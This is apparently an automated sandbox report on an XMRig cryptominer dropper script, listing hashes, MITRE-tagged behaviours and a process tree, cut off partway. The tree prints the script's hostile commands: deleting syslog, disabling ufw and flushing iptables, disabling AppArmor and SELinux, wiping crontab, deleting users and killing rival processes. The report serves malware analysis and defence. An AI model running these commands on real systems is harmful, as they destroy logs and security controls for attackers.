xmrig_linux | f5462666cfd610336545233aba5f6014699d4b07829c856d0b99956075f7331b

Resubmissions

09-09-2024 17:01

240909-vjrada1gmd 10

24-01-2024 21:55

240124-1srkdsaadr 10

Analysis

max time kernel
149s
max time network
128s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
09-09-2024 17:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a.sh
Size

6KB
MD5

e97dee2d99e3bd5150abdfb488aafeb8
SHA1

8a9b089a194b383b2202457afa1e0b3ec8fc4d3f
SHA256

f5462666cfd610336545233aba5f6014699d4b07829c856d0b99956075f7331b
SHA512

1d572bc3c7642ea007d441865c879ce4037848210a5194ea1bf262af22e9b84e674c067138531672758e2fbf7a53e82820502736827366d4688180c1f6bcfa25
SSDEEP

192:mRoo5wsIGV7DDf6jlpTWg3vMGQit/3PCd/8PY3+R3YB:mao5wgV7DDf6jlpTWg3vMGQit/3PCd//

Score

10^/10

xmrig_linux defense_evasion discovery evasion miner privilege_escalation rootkit

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig_linux
Deletes system logs 1 TTPs 1 IoCs
Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.
evasion

Clear Linux or Mac System Logs
T1070.002

Processes:

rm

description ioc process

File deleted /var/log/syslog rm
Flushes firewall rules 3 IoCs
Flushes/ disables firewall rules inside the Linux kernel.

Processes:

ufwiptablesupdate-rc.d

pid process

1553 ufw
1725 iptables
1881 update-rc.d
Loads a kernel module 1 IoCs
Loads a Linux kernel module, potentially to achieve persistence
rootkit

Processes:

modprobe

ioc pid process

/lib/modules/4.15.0-213-generic/kernel/net/ipv6/netfilter/ip6_tables.ko 1557 modprobe
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
privilege_escalation defense_evasion

Sudo and Sudo Caching
T1548.003

Processes:

sudo

pid process

1517 sudo

description	ioc	process
File deleted	/var/log/syslog	rm

pid	process
1553	ufw
1725	iptables
1881	update-rc.d

ioc	pid	process
/lib/modules/4.15.0-213-generic/kernel/net/ipv6/netfilter/ip6_tables.ko	1557	modprobe

pid	process
1517	sudo

Disables AppArmor 28 IoCs

Disables AppArmor security module.

Processes:

systemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctl

pid	process
1895	systemctl
1880	systemctl
1889	systemctl
1889	systemctl
1860	systemctl
1889	systemctl
1889	systemctl
1860	systemctl
1880	systemctl
1885	systemctl
1885	systemctl
1885	systemctl
1897	systemctl
1905	systemctl
1860	systemctl
1860	systemctl
1873	systemctl
1880	systemctl
1880	systemctl
1885	systemctl
1889	systemctl
1860	systemctl
1860	systemctl
1880	systemctl
1885	systemctl
1889	systemctl
1880	systemctl
1885	systemctl

Disables SELinux 1 IoCs
Disables SELinux security module.

Processes:

setenforce

pid process

1859 setenforce
Enumerates running processes
Discovers information about currently running processes on the system
Changes its process name 1 IoCs

Processes:

description ioc pid

Changes the process name, possibly in an attempt to hide itself (sysv-install) 1877

pid	process
1859	setenforce

description	ioc	pid
Changes the process name, possibly in an attempt to hide itself	(sysv-install)	1877

Reads CPU attributes 1 TTPs 14 IoCs

discovery

System Information Discovery

T1082

Processes:

pkillpspkillpgreppgreppkillpkillpkillpspgreppgreppkillpspgrep

description	ioc	process
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep

Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
discovery

System Information Discovery
T1082

Processes:

modprobe

description ioc process

File opened for reading /sys/module/ip6_tables/initstate modprobe
File opened for reading /sys/module/x_tables/initstate modprobe

description	ioc	process
File opened for reading	/sys/module/ip6_tables/initstate	modprobe
File opened for reading	/sys/module/x_tables/initstate	modprobe

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

killallkillallpspspgreppkillpgreppkillpgreppkillpkillpkillpspkillkillallkillallkillallkillallkillallawkpgreppgrep

description	ioc	process
File opened for reading	/proc/183/stat	killall
File opened for reading	/proc/15/cmdline	killall
File opened for reading	/proc/616/cmdline	ps
File opened for reading	/proc/1092/status	ps
File opened for reading	/proc/1154/cmdline	ps
File opened for reading	/proc/176/cmdline	pgrep
File opened for reading	/proc/89/cmdline	pkill
File opened for reading	/proc/1296/status	pgrep
File opened for reading	/proc/85/cmdline	pkill
File opened for reading	/proc/553/cmdline	ps
File opened for reading	/proc/82/cmdline	pgrep
File opened for reading	/proc/1508/cmdline	ps
File opened for reading	/proc/16/cmdline	pgrep
File opened for reading	/proc/1508/cmdline	pgrep
File opened for reading	/proc/1075/cmdline	pgrep
File opened for reading	/proc/1026/cmdline	pkill
File opened for reading	/proc/422/cmdline	pkill
File opened for reading	/proc/188/status	pkill
File opened for reading	/proc/27/stat	killall
File opened for reading	/proc/559/status	ps
File opened for reading	/proc/177/cmdline	pkill
File opened for reading	/proc/26/cmdline	pkill
File opened for reading	/proc/772/cmdline	pkill
File opened for reading	/proc/994/stat	killall
File opened for reading	/proc/25/stat	killall
File opened for reading	/proc/1141/cmdline	pkill
File opened for reading	/proc/442/cmdline	pkill
File opened for reading	/proc/30/status	pkill
File opened for reading	/proc/1191/cmdline	pkill
File opened for reading	/proc/572/cmdline	pkill
File opened for reading	/proc/485/stat	ps
File opened for reading	/proc/1179/status	pgrep
File opened for reading	/proc/1072/stat	killall
File opened for reading	/proc/1146/stat	killall
File opened for reading	/proc/31/cmdline	ps
File opened for reading	/proc/485/cmdline	ps
File opened for reading	/proc/485/cmdline	pkill
File opened for reading	/proc/9/stat	killall
File opened for reading	/proc/1129/stat	killall
File opened for reading	/proc/1133/cmdline	killall
File opened for reading	/proc/1318/stat	killall
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/185/cmdline	pkill
File opened for reading	/proc/1026/cmdline	pkill
File opened for reading	/proc/1355/cmdline	killall
File opened for reading	/proc/13/status	pgrep
File opened for reading	/proc/23/cmdline	pgrep
File opened for reading	/proc/1141/status	pgrep
File opened for reading	/proc/1101/cmdline	pkill
File opened for reading	/proc/1510/cmdline	pkill
File opened for reading	/proc/179/status	ps
File opened for reading	/proc/434/status	pgrep
File opened for reading	/proc/25/status	pkill
File opened for reading	/proc/177/stat	killall
File opened for reading	/proc/171/cmdline	pgrep
File opened for reading	/proc/1072/cmdline	ps
File opened for reading	/proc/1193/status	pkill
File opened for reading	/proc/1515/stat	ps
File opened for reading	/proc/1045/cmdline	pgrep
File opened for reading	/proc/23/status	pkill
File opened for reading	/proc/1101/stat	killall
File opened for reading	/proc/16/cmdline	pgrep
File opened for reading	/proc/175/cmdline	pgrep
File opened for reading	/proc/416/cmdline	pkill

Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.

Processes:

a.sh

description ioc process

File opened for modification /tmp/log_rot a.sh

description	ioc	process
File opened for modification	/tmp/log_rot	a.sh

/tmp/a.sh
/tmp/a.sh
1⤵
- Writes file to tmp directory
PID:1510
- /bin/grep
  grep -v grep
  2⤵
  PID:1516
- /bin/grep
  grep .docker
  2⤵
  PID:1515
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1514
- /usr/bin/sudo
  sudo -n true
  2⤵
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  PID:1517
- /bin/rm
  rm -rf /tmp/a.sh /tmp/config-err-9v8ijU /tmp/netplan_6o2m7k83 /tmp/snap-private-tmp /tmp/ssh-X651Ud74vhtf /tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty /tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF /tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-iLqnzW /tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra /tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-timedated.service-MRYxba
  2⤵
  PID:1519
- /bin/rm
  rm -rf /var/tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-nNGoa6 /var/tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-fmSYoe /var/tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-3TrBTk /var/tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-b8W9ey /var/tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-timedated.service-PIeStI
  2⤵
  PID:1520
- /bin/rm
  rm -rf /tmp/. /tmp/.. /tmp/.font-unix /tmp/.ICE-unix /tmp/.Test-unix /tmp/.X11-unix /tmp/.XIM-unix
  2⤵
  PID:1521
- /bin/rm
  rm -rf /var/tmp/. /var/tmp/..
  2⤵
  PID:1522
- /bin/rm
  rm -rf /root/.docker.json
  2⤵
  PID:1523
- /bin/rm
  rm -rf /root/.xmrig.json
  2⤵
  PID:1524
- /bin/rm
  rm -rf /root/.config/docker.json
  2⤵
  PID:1525
- /bin/rm
  rm -rf /root/.config/xmrig.json
  2⤵
  PID:1526
- /usr/bin/pgrep
  pgrep kdevtmp
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1528
- /usr/bin/pgrep
  pgrep kthreaddk
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1529
- /usr/bin/pgrep
  pgrep kinsing
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1530
- /usr/bin/pgrep
  pgrep solrd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1531
- /usr/bin/pgrep
  pgrep sidekiq
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1532
- /usr/bin/pkill
  pkill -f kthreaddi
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1536
- /usr/bin/pkill
  pkill -f kdevtmpfsi
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1537
- /usr/bin/pkill
  pkill -f xmrig
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1538
- /usr/bin/pkill
  pkill -f kinsing
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1539
- /usr/bin/pkill
  pkill -f systemdd-dev
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1540
- /usr/bin/killall
  killall -9 .dockerd
  2⤵
  - Reads runtime system information
  PID:1541
- /usr/bin/killall
  killall -9 .docker
  2⤵
  - Reads runtime system information
  PID:1542
- /usr/bin/killall
  killall -9 xmrig
  2⤵
  - Reads runtime system information
  PID:1543
- /usr/bin/killall
  killall -9 kthreaddi
  2⤵
  - Reads runtime system information
  PID:1544
- /usr/bin/killall
  killall -9 kdevtmpfsi
  2⤵
  PID:1545
- /usr/bin/killall
  killall -9 kinsing
  2⤵
  - Reads runtime system information
  PID:1546
- /usr/bin/killall
  killall -9 ssrr
  2⤵
  - Reads runtime system information
  PID:1547
- /usr/bin/killall
  killall -9 .dockerd
  2⤵
  - Reads runtime system information
  PID:1548
- /usr/bin/killall
  killall -9 .docker
  2⤵
  PID:1549
- /usr/bin/killall
  killall /bin/bash /var/tmp/.dockerd
  2⤵
  PID:1550
- /usr/bin/killall
  killall /bin/bash /.docker
  2⤵
  PID:1551
- /bin/rm
  rm -rf /var/log/syslog
  2⤵
  - Deletes system logs
  PID:1552
- /usr/sbin/ufw
  ufw disable
  2⤵
  - Flushes firewall rules
  PID:1553
- - /sbin/iptables
    /sbin/iptables -V
    3⤵
    PID:1554
- - /lib/ufw/ufw-init
    /lib/ufw/ufw-init force-stop
    3⤵
    PID:1555
  - - /sbin/ip6tables
      ip6tables -L INPUT -n
      4⤵
      PID:1556
    - - /sbin/modprobe
        
        /sbin/modprobe ip6_tables
        5⤵
        Loads a kernel module
        Enumerates kernel/hardware configuration
        
        PID:1557
  - - /sbin/iptables
      iptables -F ufw-logging-deny
      4⤵
      PID:1561
  - - /sbin/iptables
      iptables -F ufw-logging-allow
      4⤵
      PID:1564
  - - /sbin/iptables
      iptables -F ufw-not-local
      4⤵
      PID:1565
  - - /sbin/iptables
      iptables -F ufw-user-logging-input
      4⤵
      PID:1566
  - - /sbin/iptables
      iptables -F ufw-user-limit-accept
      4⤵
      PID:1567
  - - /sbin/iptables
      iptables -F ufw-user-limit
      4⤵
      PID:1568
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-input
      4⤵
      PID:1569
  - - /sbin/iptables
      iptables -F ufw-reject-input
      4⤵
      PID:1570
  - - /sbin/iptables
      iptables -F ufw-after-logging-input
      4⤵
      PID:1571
  - - /sbin/iptables
      iptables -F ufw-after-input
      4⤵
      PID:1572
  - - /sbin/iptables
      iptables -F ufw-user-input
      4⤵
      PID:1573
  - - /sbin/iptables
      iptables -F ufw-before-input
      4⤵
      PID:1574
  - - /sbin/iptables
      iptables -F ufw-before-logging-input
      4⤵
      PID:1575
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-forward
      4⤵
      PID:1576
  - - /sbin/iptables
      iptables -F ufw-reject-forward
      4⤵
      PID:1577
  - - /sbin/iptables
      iptables -F ufw-after-logging-forward
      4⤵
      PID:1578
  - - /sbin/iptables
      iptables -F ufw-after-forward
      4⤵
      PID:1579
  - - /sbin/iptables
      iptables -F ufw-user-logging-forward
      4⤵
      PID:1580
  - - /sbin/iptables
      iptables -F ufw-user-forward
      4⤵
      PID:1581
  - - /sbin/iptables
      iptables -F ufw-before-forward
      4⤵
      PID:1582
  - - /sbin/iptables
      iptables -F ufw-before-logging-forward
      4⤵
      PID:1583
  - - /sbin/iptables
      iptables -F ufw-track-forward
      4⤵
      PID:1584
  - - /sbin/iptables
      iptables -F ufw-track-output
      4⤵
      PID:1585
  - - /sbin/iptables
      iptables -F ufw-track-input
      4⤵
      PID:1586
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-output
      4⤵
      PID:1587
  - - /sbin/iptables
      iptables -F ufw-reject-output
      4⤵
      PID:1588
  - - /sbin/iptables
      iptables -F ufw-after-logging-output
      4⤵
      PID:1589
  - - /sbin/iptables
      iptables -F ufw-after-output
      4⤵
      PID:1590
  - - /sbin/iptables
      iptables -F ufw-user-logging-output
      4⤵
      PID:1591
  - - /sbin/iptables
      iptables -F ufw-user-output
      4⤵
      PID:1592
  - - /sbin/iptables
      iptables -F ufw-before-output
      4⤵
      PID:1593
  - - /sbin/iptables
      iptables -F ufw-before-logging-output
      4⤵
      PID:1594
  - - /sbin/iptables
      iptables -Z ufw-logging-deny
      4⤵
      PID:1595
  - - /sbin/iptables
      iptables -Z ufw-logging-allow
      4⤵
      PID:1596
  - - /sbin/iptables
      iptables -Z ufw-not-local
      4⤵
      PID:1597
  - - /sbin/iptables
      iptables -Z ufw-user-logging-input
      4⤵
      PID:1598
  - - /sbin/iptables
      iptables -Z ufw-user-limit-accept
      4⤵
      PID:1599
  - - /sbin/iptables
      iptables -Z ufw-user-limit
      4⤵
      PID:1600
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-input
      4⤵
      PID:1601
  - - /sbin/iptables
      iptables -Z ufw-reject-input
      4⤵
      PID:1602
  - - /sbin/iptables
      iptables -Z ufw-after-logging-input
      4⤵
      PID:1603
  - - /sbin/iptables
      iptables -Z ufw-after-input
      4⤵
      PID:1604
  - - /sbin/iptables
      iptables -Z ufw-user-input
      4⤵
      PID:1605
  - - /sbin/iptables
      iptables -Z ufw-before-input
      4⤵
      PID:1606
  - - /sbin/iptables
      iptables -Z ufw-before-logging-input
      4⤵
      PID:1607
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-forward
      4⤵
      PID:1608
  - - /sbin/iptables
      iptables -Z ufw-reject-forward
      4⤵
      PID:1609
  - - /sbin/iptables
      iptables -Z ufw-after-logging-forward
      4⤵
      PID:1610
  - - /sbin/iptables
      iptables -Z ufw-after-forward
      4⤵
      PID:1611
  - - /sbin/iptables
      iptables -Z ufw-user-logging-forward
      4⤵
      PID:1612
  - - /sbin/iptables
      iptables -Z ufw-user-forward
      4⤵
      PID:1613
  - - /sbin/iptables
      iptables -Z ufw-before-forward
      4⤵
      PID:1614
  - - /sbin/iptables
      iptables -Z ufw-before-logging-forward
      4⤵
      PID:1615
  - - /sbin/iptables
      iptables -Z ufw-track-forward
      4⤵
      PID:1616
  - - /sbin/iptables
      iptables -Z ufw-track-output
      4⤵
      PID:1617
  - - /sbin/iptables
      iptables -Z ufw-track-input
      4⤵
      PID:1618
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-output
      4⤵
      PID:1619
  - - /sbin/iptables
      iptables -Z ufw-reject-output
      4⤵
      PID:1620
  - - /sbin/iptables
      iptables -Z ufw-after-logging-output
      4⤵
      PID:1621
  - - /sbin/iptables
      iptables -Z ufw-after-output
      4⤵
      PID:1622
  - - /sbin/iptables
      iptables -Z ufw-user-logging-output
      4⤵
      PID:1623
  - - /sbin/iptables
      iptables -Z ufw-user-output
      4⤵
      PID:1624
  - - /sbin/iptables
      iptables -Z ufw-before-output
      4⤵
      PID:1625
  - - /sbin/iptables
      iptables -Z ufw-before-logging-output
      4⤵
      PID:1626
  - - /sbin/iptables
      iptables -X ufw-logging-deny
      4⤵
      PID:1627
  - - /sbin/iptables
      iptables -X ufw-logging-allow
      4⤵
      PID:1628
  - - /sbin/iptables
      iptables -X ufw-not-local
      4⤵
      PID:1629
  - - /sbin/iptables
      iptables -X ufw-user-logging-input
      4⤵
      PID:1630
  - - /sbin/iptables
      iptables -X ufw-user-logging-output
      4⤵
      PID:1631
  - - /sbin/iptables
      iptables -X ufw-user-logging-forward
      4⤵
      PID:1632
  - - /sbin/iptables
      iptables -X ufw-user-limit-accept
      4⤵
      PID:1633
  - - /sbin/iptables
      iptables -X ufw-user-limit
      4⤵
      PID:1634
  - - /sbin/iptables
      iptables -X ufw-user-input
      4⤵
      PID:1635
  - - /sbin/iptables
      iptables -X ufw-user-forward
      4⤵
      PID:1636
  - - /sbin/iptables
      iptables -X ufw-user-output
      4⤵
      PID:1637
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-input
      4⤵
      PID:1638
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-output
      4⤵
      PID:1639
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-forward
      4⤵
      PID:1640
  - - /sbin/iptables
      iptables -P INPUT ACCEPT
      4⤵
      PID:1641
  - - /sbin/iptables
      iptables -P OUTPUT ACCEPT
      4⤵
      PID:1642
  - - /sbin/iptables
      iptables -P FORWARD ACCEPT
      4⤵
      PID:1643
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-deny
      4⤵
      PID:1644
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-allow
      4⤵
      PID:1645
  - - /sbin/ip6tables
      ip6tables -F ufw6-not-local
      4⤵
      PID:1646
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-input
      4⤵
      PID:1647
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit-accept
      4⤵
      PID:1648
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit
      4⤵
      PID:1649
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-input
      4⤵
      PID:1650
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-input
      4⤵
      PID:1651
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-input
      4⤵
      PID:1652
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-input
      4⤵
      PID:1653
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-input
      4⤵
      PID:1654
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-input
      4⤵
      PID:1655
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-input
      4⤵
      PID:1656
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-forward
      4⤵
      PID:1657
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-forward
      4⤵
      PID:1658
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-forward
      4⤵
      PID:1659
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-forward
      4⤵
      PID:1660
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-forward
      4⤵
      PID:1661
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-forward
      4⤵
      PID:1662
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-forward
      4⤵
      PID:1663
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-forward
      4⤵
      PID:1664
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-forward
      4⤵
      PID:1665
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-output
      4⤵
      PID:1666
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-input
      4⤵
      PID:1667
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-output
      4⤵
      PID:1668
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-output
      4⤵
      PID:1669
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-output
      4⤵
      PID:1670
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-output
      4⤵
      PID:1671
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-output
      4⤵
      PID:1672
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-output
      4⤵
      PID:1673
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-output
      4⤵
      PID:1674
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-output
      4⤵
      PID:1675
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-deny
      4⤵
      PID:1676
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-allow
      4⤵
      PID:1677
  - - /sbin/ip6tables
      ip6tables -Z ufw6-not-local
      4⤵
      PID:1678
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-input
      4⤵
      PID:1679
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit-accept
      4⤵
      PID:1680
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit
      4⤵
      PID:1681
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-input
      4⤵
      PID:1682
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-input
      4⤵
      PID:1683
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-input
      4⤵
      PID:1684
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-input
      4⤵
      PID:1685
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-input
      4⤵
      PID:1686
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-input
      4⤵
      PID:1687
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-input
      4⤵
      PID:1688
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-forward
      4⤵
      PID:1689
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-forward
      4⤵
      PID:1690
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-forward
      4⤵
      PID:1691
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-forward
      4⤵
      PID:1692
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-forward
      4⤵
      PID:1693
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-forward
      4⤵
      PID:1694
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-forward
      4⤵
      PID:1695
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-forward
      4⤵
      PID:1696
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-forward
      4⤵
      PID:1697
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-output
      4⤵
      PID:1698
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-input
      4⤵
      PID:1699
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-output
      4⤵
      PID:1700
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-output
      4⤵
      PID:1701
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-output
      4⤵
      PID:1702
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-output
      4⤵
      PID:1703
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-output
      4⤵
      PID:1704
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-output
      4⤵
      PID:1705
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-output
      4⤵
      PID:1706
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-output
      4⤵
      PID:1707
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-deny
      4⤵
      PID:1708
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-allow
      4⤵
      PID:1709
  - - /sbin/ip6tables
      ip6tables -X ufw6-not-local
      4⤵
      PID:1710
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-input
      4⤵
      PID:1711
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-output
      4⤵
      PID:1712
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-forward
      4⤵
      PID:1713
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit-accept
      4⤵
      PID:1714
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit
      4⤵
      PID:1715
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-input
      4⤵
      PID:1716
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-forward
      4⤵
      PID:1717
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-output
      4⤵
      PID:1718
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-input
      4⤵
      PID:1719
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-output
      4⤵
      PID:1720
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-forward
      4⤵
      PID:1721
  - - /sbin/ip6tables
      ip6tables -P INPUT ACCEPT
      4⤵
      PID:1722
  - - /sbin/ip6tables
      ip6tables -P OUTPUT ACCEPT
      4⤵
      PID:1723
  - - /sbin/ip6tables
      ip6tables -P FORWARD ACCEPT
      4⤵
      PID:1724
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:1725
- /usr/sbin/userdel
  userdel akay
  2⤵
  PID:1726
- /usr/sbin/userdel
  userdel vfinder
  2⤵
  PID:1730
- /bin/grep
  grep -i "[a]liyun"
  2⤵
  PID:1735
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1731
- /bin/grep
  grep -i "[y]unjing"
  2⤵
  PID:1737
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1736
- /usr/bin/crontab
  crontab -r
  2⤵
  PID:1738
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1744
- /bin/grep
  grep -v -
  2⤵
  PID:1743
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1742
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1741
- /bin/grep
  grep :143
  2⤵
  PID:1740
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1750
- /bin/grep
  grep -v -
  2⤵
  PID:1749
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1748
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1747
- /bin/grep
  grep :2222
  2⤵
  PID:1746
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1756
- /bin/grep
  grep -v -
  2⤵
  PID:1755
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1754
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1753
- /bin/grep
  grep :3333
  2⤵
  PID:1752
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1762
- /bin/grep
  grep -v -
  2⤵
  PID:1761
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1760
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1759
- /bin/grep
  grep :3389
  2⤵
  PID:1758
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1768
- /bin/grep
  grep -v -
  2⤵
  PID:1767
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1766
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1765
- /bin/grep
  grep :4444
  2⤵
  PID:1764
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1774
- /bin/grep
  grep -v -
  2⤵
  PID:1773
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
